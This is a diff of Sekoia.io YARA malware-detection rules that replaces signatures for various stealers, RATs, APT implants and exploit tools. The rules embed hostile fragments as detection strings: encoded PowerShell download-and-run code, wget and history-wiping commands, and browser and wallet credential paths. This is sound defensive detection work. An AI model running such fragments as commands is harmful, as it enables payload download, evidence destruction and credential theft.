@@ -243020,33 +243717,24 @@ rule SEKOIA_Win_Malware_Statc_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$powershell = "powershell.exe"
-		$a1 = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8A"
-		$a2 = "gATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvA"
-		$a3 = "oAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACIAaAB0AHQAcABzADoALw"
-		$b1 = "aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABc"
-		$b2 = "kAbgB2AG8AawBlAC0AZQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAJABlAG4AdgA6AFQARQBNAFAAX"
-		$b3 = "pAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAF"
-		$c1 = "MQAgADEAIgA7ACAAIgBPAEsAIgA7"
-		$c2 = "EAIAAxACIAOwAgACIATwBLACIAO"
-		$c3 = "xACAAMQAiADsAIAAiAE8ASwAiAD"
+		$s1 = "go.buildid"
+		$s2 = "github.com/OXDBXKXO/ez-pwnkit"
 
 	condition:
-		$powershell at 0 and 1 of ( $a* ) and 1 of ( $b* ) and 1 of ( $c* ) and filesize < 1MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and $s1 and #s2 > 5
 }
-rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader_Encoded : FILE
+rule SEKOIA_Apt_Apt28_Wayzgoose_Exploit_String : FILE
 {
 	meta:
-		description = "Detects encoded version of Gamaredon LNK USB Spreader"
+		description = "Detects APT28's Wayzgoose exploit strings"
 		author = "Sekoia.io"
-		id = "e42bb654-d1aa-4219-b3da-dd4053d59a83"
-		date = "2023-06-19"
+		id = "23d9e09e-202c-47f5-abf7-6b5085e44400"
+		date = "2024-04-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader_encoded.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01"
-		logic_hash = "81ab55330b3003cb698ade7e14eaea5fb03e5d2d3dd310b7db682aeef9b51f6e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_wayzgoose_exploit_string.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "804de275f7e8c43fe5690c0bd9338b134c0c47f845f1c3b3a747c3765815084c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243054,26 +243742,27 @@ rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader_Encoded : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" ascii
-		$s2 = " 1000000){" base64
-		$s3 = "+\"\\$" base64
-		$s4 = ",3\";" base64
+		$ = "wayzgoose.dll"
+		$ = "wayzgoose_get_version"
+		$ = "NtSetInformationFile"
+		$ = "ZwDuplicateObject"
+		$ = "ZwClose"
 
 	condition:
-		$s1 at 0 and 3 of them and filesize < 4000
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Stealer_Win_Demotryspy : FILE
+rule SEKOIA_Apt_Muddywater_Powgoop_Decoded : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects decoded PowGoop malware"
 		author = "Sekoia.io"
-		id = "70af0e40-b177-49a3-bff4-723f3f4aa375"
-		date = "2024-02-09"
+		id = "194cb9ef-da96-42b6-a3b5-b0aee7495f2c"
+		date = "2022-01-13"
 		modified = "2024-12-19"
-		reference = "https://paper.seebug.org/3115/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/stealer_win_demotryspy.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b7a910e4d394d2122e6b4fe76daa6691a642396e27f7a47d09232f4b7eb424ee"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_powgoop_decoded.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6654d8107bb2ad6344f1fa03c6525ed9a0b8e49627787355efe857e80a02eca4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243081,29 +243770,31 @@ rule SEKOIA_Stealer_Win_Demotryspy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$demotry1 = "DemoTry.exe"
-		$demotry2 = "DemoTry\\Release\\DemoTry.pdb"
-		$wide1 = "\\loc.tmp" wide
-		$wide2 = "\\log.tmp" wide
-		$wide3 = "\\Google\\Chrome\\User Data" wide
-		$wide4 = "\\Default\\Login data" wide
-		$wide5 = "\\Local State" wide
+		$h1 = "[System.Net.WebRequest]::Create(" ascii wide
+		$h2 = "Headers.Add('Authorization'" ascii wide
+		$h3 = "Headers.Add('Cookie',('value=' + $ec + ';')" ascii wide
+		$h4 = ".GetResponse()" ascii wide
+		$h5 = "GetResponseStream()" ascii wide
+		$c1 = "return (65..90) + (97..122) | Get-Random -Count" ascii wide
+		$c2 = "% {[char]$_}" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( 1 of ( $demotry* ) or all of ( $wide* ) )
+		filesize > 1KB and filesize < 1MB and ( $h2 in ( @h1 .. @h5 ) and $h3 in ( @h1 .. @h5 ) and $h4 in ( @h1 .. @h5 ) ) or ( $c2 in ( @c1 .. @c1 + 50 ) ) and true
 }
-rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
+rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Pdf : FILE
 {
 	meta:
-		description = "Detect the linux Zerobot implant using specific strings"
+		description = "Detects malicious PDF used by APT29 to drop Wineloader"
 		author = "Sekoia.io"
-		id = "ce028297-a526-4a6a-95db-8762fb5895f6"
-		date = "2022-08-05"
+		id = "b1db731e-471e-493a-b76c-38d2808ccac9"
+		date = "2024-03-25"
 		modified = "2024-12-19"
-		reference = "https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_lin_zerobot_dec22.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0f4faba9873fa360615b20bc637ecb40f56e6c7f65153f61a762e378320f94c1"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt29_wineloader_malicious_pdf.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "9712217ff3597468b48cdf45da588005de3a725ba554789bb7e5ae1b0f7c02a7"
+		hash = "3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9"
+		logic_hash = "784f5ab2602e2185e8253b5b8d9a084ede0604457b0a0674fceffbcb226e3ba1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243111,37 +243802,28 @@ rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "rm -rf "
-		$str02 = "wget http://"
-		$str03 = "curl -O http://"
-		$str04 = "tftp"
-		$str05 = "-c get"
-		$str06 = "ftpget -v -u anonymous -P"
-		$str07 = "chmod 777"
-		$str08 = "nohup"
-		$str09 = "/dev/null 2>&1 &"
-		$str10 = "zero."
-		$str11 = "ppc64le"
-		$str12 = "riscv64"
-		$str13 = "s390x"
-		$str14 = "rm -rf ~/.bash_history"
-		$str15 = "history -c"
+		$s1 = "<</Type/Annot/Subtype/Link/Border[0 0 0]/Rect["
+		$s2 = "/A<</Type/Action/S/URI/URI("
+		$s3 = { 2f [2-10] 2e 70 68 70 29 3e 3e }
+		$s4 = "JamrulNormal"
 
 	condition:
-		11 of ( $str* ) and filesize < 10KB
+		uint32be( 0 ) == 0x25504446 and $s2 in ( @s1 .. @s3 ) and $s4
 }
-rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
+
+rule SEKOIA_Implant_Win_Incontroller : FILE
 {
 	meta:
-		description = "New variant of Kazuar observed in 2023"
+		description = "Detect the INCONTROLLER implant "
 		author = "Sekoia.io"
-		id = "51e9de6a-5d8a-4627-8063-b70f78e78726"
-		date = "2023-11-03"
+		id = "c346c6ea-c5c0-4e9f-a632-1e8ed0286fbc"
+		date = "2022-04-14"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_turla_kazuar_variant_2023.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "98207fef906c922ff09f72b0dea7103c0fb86c5ec4712a23ecba6840b79b0ad5"
+		reference = "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_incontroller.yar#L4-L49"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "69296ca3575d9bc04ce0250d734d1a83c1348f5b6da756944933af0578bd41d2"
+		logic_hash = "988e3004169817758a38dc7cd621ed351dac4de41e6dad03ab1cdfc07b8a6cac"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243149,25 +243831,34 @@ rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Started from file '" ascii wide
-		$s2 = "Zombifying user's" ascii wide
-		$s3 = "Result #{0:X16} already exists in {1}" ascii wide
+		$ = "AsRockDrv.sys" ascii
+		$ = "C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb" ascii
+		$ = "found map in %.3f sec physical address : %016I64x" ascii
+		$ = "get physical regions error : %x!"
+		$ = "Device AsrDrv103 was opened successefuly!" ascii
+		$ = "Ioctl handler AsrDrv103 was found successefuly!" ascii
+		$ = "cant open the AsrDrv103!" ascii
+		$ = "can't read a unsigned driver ! " ascii
+		$ = "cant drop and load exploatable driver ! " ascii
+		$ = "please set unsigned driver as argument to program!" ascii
+		$ = "\\DosDevices\\AsrDrv103" wide
+		$t = "This program cannot be run in DOS mode."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		( uint16( 0 ) == 0x5A4D and 4 of them and filesize < 800KB and #t == 2 ) or pe.imphash ( ) == "f139e860bc959a7e65a008399425c090" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a2fe4d32d74354c391a283178f0291e6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c33f9caa68fe46c6996a928ba5a38fd6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d9a1f1a4d48906da1d9f33eae0f0eaef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "76426b0209a87fa32ca28e9f2361be67" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9e63a5064b755925598b8d72ace52dc9" ) or hash.md5 ( pe.rich_signature.clear_data ) == "140d7fb360dbebb03edab903b5d08285"
 }
-rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
+rule SEKOIA_Implant_Win_Geacon : FILE
 {
 	meta:
-		description = "Finds Daolpu Stealer samples based on specific strings."
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "dde1cf12-48d8-45b6-b453-b7196e6b1271"
-		date = "2024-07-23"
+		id = "064eabe0-aee5-4e5e-9f5e-69b32b1ba0da"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_daolpu_str.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9372a88efcdca6ca57f354fb31569522e5458271cc51dfedf09c6178a47a5b67"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_geacon.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "74b0d2fbb8b7f6666543ba4fdfd9f9d2064d3a89d21c90d794b57f0009199fea"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243175,109 +243866,158 @@ rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Content-Type: %s%s%s" ascii
-		$str02 = "Content-Disposition: %s%s%s%s%s%s%s" ascii
-		$str03 = "\\CocCoc\\Browser\\User Data\\Local State" ascii
-		$str04 = "\\Microsoft\\Edge\\User Data\\Default\\Login Data" ascii
-		$str05 = "\\Mozilla\\Firefox\\Profiles" ascii
-		$str06 = "No MAC Address Found" ascii
-		$str07 = "C:\\Windows\\Temp\\" ascii
-		$str08 = "C:\\Windows\\Temp\\result.txt" ascii
-		$str09 = "Privatekey@2211#$" ascii
-		$str10 = "CryptStringToBinaryA Failed to convert BASE64 private key." ascii
-		$str11 = "taskkill /F /IM chrome.exe" ascii
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Launcher : FILE
+rule SEKOIA_Downloader_Mac_Rustbucket : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane launcher"
+		description = "RustBucket fake PDF reader"
 		author = "Sekoia.io"
-		id = "26fbf4df-aa08-47b6-a73c-e8f80a408454"
-		date = "2024-11-22"
+		id = "5a003b68-ad9a-47f9-b157-dd898181dac2"
+		date = "2023-04-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gelsemium_wolfsbane_launcher.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "87e437cf74ce4b1330b8af9ff71edae2"
-		logic_hash = "9ecc3a8cb82f6183c263dde03a14f721d2e3aeb2338afc28e0368c323e5d51a9"
+		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_rustbucket.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1b9e9a3f4fb4804eb94ab8d3573781d67f96d180b258cfc10be384eec44509ed"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880"
+		hash2 = "bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49"
+		hash3 = "7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407"
+		hash4 = "e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c"
 
 	strings:
-		$ = "rm -f /dev/shm/sem*%s"
-		$ = "/etc/ld.so.preload"
-		$ = "kill -9 %d 2>/dev/null"
-		$ = "/,1d' %s 2>/dev/null"
+		$down_exec1 = "_down_update_run" nocase
+		$down_exec2 = "downAndExec" nocase
+		$encrypt1 = "_encrypt_pdf"
+		$encrypt2 = "_encrypt_data"
+		$error_msg1 = "_alertErr"
+		$error_msg2 = "_show_error_msg"
+		$view_pdf1 = "-[PEPWindow view_pdf:]"
+		$view_pdf2 = "-[PEPWindow viewPDF:]"
+		$macho_magic = {CF FA ED FE}
+		$java_magic = {CA FE BA BE}
 
 	condition:
-		uint32be( 0 ) == 0x7F454C46 and filesize < 500KB and all of them
+		($macho_magic at 0 or $java_magic at 0 ) and 5 of them and filesize > 50KB
 }
-rule SEKOIA_Exploit_Linux_Eop_Polkit_Pkexec_Strings : FILE
+rule SEKOIA_Infostealer_Win_Lighting : FILE
 {
 	meta:
-		description = "Detects Polkit Local Privesc exploit"
+		description = "Detect the Lighting infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "de45c29e-432a-4e4f-b700-a016341d56d2"
-		date = "2023-12-08"
+		id = "3c160c16-f417-4fa2-aa44-fb7b981fb2b3"
+		date = "2022-04-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_polkit_pkexec_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "42d04204481c165ba1b5c4ee5ff1094c31400669b0eca041d736473d481e74b7"
+		reference = "https://blog.cyble.com/2022/04/05/inside-lightning-stealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_lighting.yar#L1-L40"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1c1d39ce886a433a352c55bf436b959ef528ad7ce38027243ed5b5f1ac79822f"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[.] Spawning suid process (%s) ..."
-		$ = "[.] Tracing midpid ..."
-		$ = "PTRACE_TRACEME local root (CVE-2019-13272)"
+		$str0 = "\\logins.json" wide
+		$str1 = "key3.db" wide
+		$str2 = "\\key4.db" wide
+		$str3 = "cert9.db" wide
+		$str4 = "\\places.sqlite" wide
+		$str5 = "7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9" ascii
+		$str6 = "potentiallyVulnerablePasswords" wide
+		$dll0 = "\\mozglue.dll" wide
+		$dll1 = "\\nss3.dll" wide
+		$dll2 = "SbieDll.dll" wide
+		$app00 = "\\discord\\Local Storage\\leveldb\\" wide
+		$app01 = "Software\\Valve\\Steam" wide
+		$app02 = "Telegram Desktop\\tdata" wide
+		$app03 = "\\Wallets\\Armory\\" wide
+		$app04 = "\\Wallets\\Atomic\\Local Storage\\leveldb\\" wide
+		$app05 = "\\Exodus\\exodus.wallet\\" wide
+		$app06 = "\\Wallets\\Zcash\\" wide
+		$app07 = "uCozMedia\\Uran" wide
+		$app08 = "Comodo\\IceDragon" wide
+		$app09 = "8pecxstudios\\Cyberfox" wide
+		$app10 = "NETGATE Technologies\\BlackHaw" wide
+		$app11 = "Moonchild Productions\\Pale Moon" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and 6 of ( $str* ) and all of ( $dll* ) and 10 of ( $app* )
 }
-
-rule SEKOIA_Downloader_Win_Fake_Tor_Browser
+rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
 {
 	meta:
-		description = "Detect fake TOR browser used to spy Chinese TOR users"
+		description = "Finds Nemesis Stealer samples based on specific strings, from samples without strings obsucation, or from memory"
 		author = "Sekoia.io"
-		id = "6b070ba6-490b-43c2-9a01-65812d829eeb"
-		date = "2022-10-05"
+		id = "01d85bd5-ea93-44ff-b36a-9cd9eb54d634"
+		date = "2023-03-29"
 		modified = "2024-12-19"
-		reference = "https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_fake_tor_browser.yar#L4-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5fe60673e54a6904f4fd068b04b950b895b18e7766d2e7343eae2b1bba9591f9"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_nemesis_in_memory.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "65d2dd9a10238e6d65d8992aa9cc145f73bcba9be49ed552f8b0c44723ec4c87"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$str01 = "NemesisProject.Modules." ascii
+		$str02 = "~[NEMESIS INIZIALIZE]~" wide
+		$str03 = "Clip_BoardText.txt" wide
+		$str04 = "stealer_out.zip" wide
+		$str05 = "<span style=\"color:#FFFFFF\">Number of running processes:</span>" wide
+		$str06 = "<span style=\"color:#FFFFFF\">Installed FireWall: </span>" wide
+		$str07 = "~[Panel_Receiving_Data]~ Incorrect data when receiving data on the panel" wide
+		$str08 = "ProcessInfo_Log.txt" wide
+		$str09 = "Installed_Software_Log.txt" wide
+		$str10 = "Detect Data ClipBoard] - [ {DateTime.Now:MM.dd.yyyy - HH:mm:ss}]" wide
+		$str11 = "VPN/ProtonVPN_Log.txt" wide
+		$str12 = "VPN/Nord_Log.txt" wide
+		$str13 = "Steam/SteamID_Log.txt" wide
+
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7172f95f934574be95c0250fb42b8f51" )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
+rule SEKOIA_Backdoor_Powershellempire_Csharp : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects CSharp version of Empire"
 		author = "Sekoia.io"
-		id = "d1ef0bd1-37dc-405f-b82b-288b1798455c"
-		date = "2023-05-15"
+		id = "952e8e9b-8e4d-4550-9cf4-7ffd2f9d0672"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_commonmagic_screenshot_module.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "caab57534a00620974f7d49c7b38a3f191aca596b69b3e4c499e3099023c2f9c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_powershellempire_csharp.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "536ef1167627c3dadb866d55e7eae2220c3fbd6961e2cfa71656656d984b9b90"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243285,66 +244025,67 @@ rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s_%02d.%02d.%04d_%02d.%02d.%02d.%03d.%s" wide
-		$ = "Screenshot" wide
-		$ = "\\\\.\\pipe\\PipeDtMd" wide
+		$ = "[-] Catastrophic .Net Agent Failure, Attempting Agent Restart:" ascii wide
+		$ = "[!] Upload failed - No Delimiter" ascii wide
+		$ = "SELECT * FROM Win32_IP4RouteTable" ascii wide
+		$ = "no shell command supplied" ascii wide
+		$ = "[-] CmdletInvocationException:" ascii wide
+		$ = "[*] File download of" ascii wide
+		$ = "Script successfully saved in memory" ascii wide
+		$ = "Invoke-Empire" ascii wide
+		$ = "website to reach:" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 1MB
 }
-rule SEKOIA_Rat_Lin_Gobrat_2023 : FILE
+rule SEKOIA_Rat_Darkvision_String : FILE
 {
 	meta:
-		description = "This rule detect samples that are downloaded on the GobRAT C2 URL path /a, /b and /c."
+		description = "DarkVision RAT based on string"
 		author = "Sekoia.io"
-		id = "ca36a586-f87f-445f-95dc-52d447c1d2a2"
-		date = "2023-06-09"
+		id = "ab698a79-42ee-452a-a3ba-1a9872d5e2bc"
+		date = "2024-09-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_lin_gobrat_2023.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b9831cefded9e48ef169aa56c18628a9871760ae613f75b232019b4798944e16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_darkvision_string.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "8ec5526cecc596e0711c82e39cd4f2ce"
+		hash = "2dd476464e46d91ffe68483cb478d9b4"
+		hash = "20de7547d79d3637430b6a0787e59df5"
+		hash = "60d1e02316e6f22e078f9aa710790912"
+		hash = "e136e51efc22b0e071c11e7d652ea3be"
+		hash = "f466be81310147fcdd9a7886735a3786"
+		hash = "5065134cf4ba765bd97bb2edb61c5869"
+		hash = "6ed21c4f507e8cc830141ff732bd5acc"
+		hash = "40b2641150f291ca07bd08ab629fe1ed"
+		hash = "3f20cd14137e0abfa84b39e29a277350"
+		hash = "7dc8427be8b4d26a49fd380ad40d3b96"
+		logic_hash = "63ed3b1a991dc07bd06678a58449e0a67dd9453b358c0ac82a9c38235394122b"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "36cb17d9d118bd9692106c8aafab2462aacf1cdad3a6afb0e4f1de898a7db0e1"
-		hash2 = "28a714f7cec4445dbd507b85016c8e96ed5e378bcabe2e422c499975122b3f03"
